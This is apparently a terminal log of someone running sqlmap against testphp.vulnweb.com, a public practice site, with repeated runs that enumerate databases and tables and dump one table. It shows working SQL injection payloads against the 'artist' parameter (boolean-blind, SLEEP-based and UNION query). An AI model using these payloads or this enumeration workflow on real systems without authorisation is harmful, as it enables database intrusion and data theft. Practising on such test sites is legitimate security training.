┌──(zitsaman11㉿MFThree)-[~]
└─$ sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs >> ~/Desktop/sql_inject1.txt 

        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.6.7#stable}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:23:01 /2022-11-05/

[06:23:01] [INFO] resuming back-end DBMS 'mysql' 
[06:23:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 7950=7950

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 8503 FROM (SELECT(SLEEP(5)))WCBX)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-8128 UNION ALL SELECT NULL,CONCAT(0x7162767071,0x4e7a7263706c614355704a7264786e77684747456d58796d6269774d4c576b6d48767a6546506b6c,0x716a707a71),NULL-- -
---
[06:23:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
[06:23:01] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[06:23:01] [INFO] fetched data logged to text files under '/home/zitsaman11/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 06:23:01 /2022-11-05/

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.7#stable}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:26:44 /2022-11-05/

[06:26:44] [INFO] resuming back-end DBMS 'mysql' 
[06:26:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 7950=7950

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 8503 FROM (SELECT(SLEEP(5)))WCBX)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-8128 UNION ALL SELECT NULL,CONCAT(0x7162767071,0x4e7a7263706c614355704a7264786e77684747456d58796d6269774d4c576b6d48767a6546506b6c,0x716a707a71),NULL-- -
---
[06:26:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
[06:26:44] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

[06:26:45] [INFO] fetched data logged to text files under '/home/zitsaman11/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 06:26:45 /2022-11-05/

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.6.7#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:27:06 /2022-11-05/

[06:27:06] [INFO] resuming back-end DBMS 'mysql' 
[06:27:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 7950=7950

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 8503 FROM (SELECT(SLEEP(5)))WCBX)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-8128 UNION ALL SELECT NULL,CONCAT(0x7162767071,0x4e7a7263706c614355704a7264786e77684747456d58796d6269774d4c576b6d48767a6546506b6c,0x716a707a71),NULL-- -
---
[06:27:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
[06:27:07] [INFO] fetching columns for table 'featured' in database 'acuart'
[06:27:07] [INFO] fetching entries for table 'featured' in database 'acuart'
[06:27:07] [INFO] fetching number of entries for table 'featured' in database 'acuart'
[06:27:07] [INFO] resumed: 0
[06:27:07] [WARNING] table 'featured' in database 'acuart' appears to be empty
Database: acuart
Table: featured
[0 entries]
+--------+--------------+
| pic_id | feature_text |
+--------+--------------+
+--------+--------------+

[06:27:07] [INFO] table 'acuart.featured' dumped to CSV file '/home/zitsaman11/.local/share/sqlmap/output/testphp.vulnweb.com/dump/acuart/featured.csv'
[06:27:07] [INFO] fetched data logged to text files under '/home/zitsaman11/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 06:27:07 /2022-11-05/

        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 06:27:21 /2022-11-05/

[06:27:21] [INFO] resuming back-end DBMS 'mysql' 
[06:27:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 7950=7950

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 8503 FROM (SELECT(SLEEP(5)))WCBX)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-8128 UNION ALL SELECT NULL,CONCAT(0x7162767071,0x4e7a7263706c614355704a7264786e77684747456d58796d6269774d4c576b6d48767a6546506b6c,0x716a707a71),NULL-- -
---
[06:27:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.6.40, Nginx 1.19.0
back-end DBMS: MySQL >= 5.0.12
[06:27:22] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[06:27:22] [INFO] fetched data logged to text files under '/home/zitsaman11/.local/share/sqlmap/output/testphp.vulnweb.com'

[*] ending @ 06:27:22 /2022-11-05/

